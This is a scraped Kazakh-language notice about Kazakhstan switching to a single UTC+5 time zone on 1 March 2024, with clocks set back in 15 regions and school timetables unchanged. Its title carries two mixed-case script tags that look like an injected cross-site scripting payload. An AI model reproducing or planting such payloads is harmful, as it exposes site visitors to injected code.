Бірыңғай уақыт белдеуі<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

29.02.2024

🕛Назар аударыңыздар!

    Қазақстан Республикасы Үкіметінің қаулысымен Қазақстан Республикасының аумағында уақытты есептеу тәртібі өзгертілді, оның шеңберінде Қазақстанның бүкіл аумағына 5-ші сағат белдеуі қолданылатын болады.

    Қаулыға сәйкес 15 өңірдің (Астана, Алматы, Шымкент қалалары, Ақмола, Алматы, Жамбыл, Қарағанды, Қостанай, Павлодар, Солтүстік Қазақстан, Түркістан, Шығыс Қазақстан облыстары және Абай, Жетісу, Ұлытау облыстары) әкімдіктері 2024 жылғы 29 ақпаннан 1 наурызға қараған түні (00:00) сағатты 1 сағатқа артқа ауыстыруы керек.

  • Мектепке дейінгі білім беру ұйымдарының жұмыс уақыты, орта, техникалық және кәсіптік білім беру ұйымдарындағы сабақтардың басталуын реттеу жергілікті атқарушы органдардың құзыретінде. Өңірлердің білім басқармаларының ақпараты бойынша сабақтар бекітілген қолданыстағы кестеге сәйкес басталады. Уақыт белдеуі ауысқанымен, сабақтар штаттық режимде өзгеріссіз жалғасады.
Просмотров: 6359

Қосымшалар:



Пікір қосу



Деректерді қолтаңбаға қосу